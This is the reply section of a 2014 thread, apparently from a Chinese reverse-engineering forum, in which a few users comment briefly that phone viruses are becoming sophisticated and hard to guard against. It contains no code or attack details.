不二男人, 2014-3-1 20:16
Viruses nowadays are getting more and more impressive... I can't take it, may as well stop using the phone.

bin3008, 2014-3-1 21:16
Thanks for sharing.

小宇0721, 2014-3-2 09:21
Impressive..
Will keep working at it...

小黑and小白, 2014-3-2 10:16
Looks like there is no way to guard against everything.
吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-4-3 00:48

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.
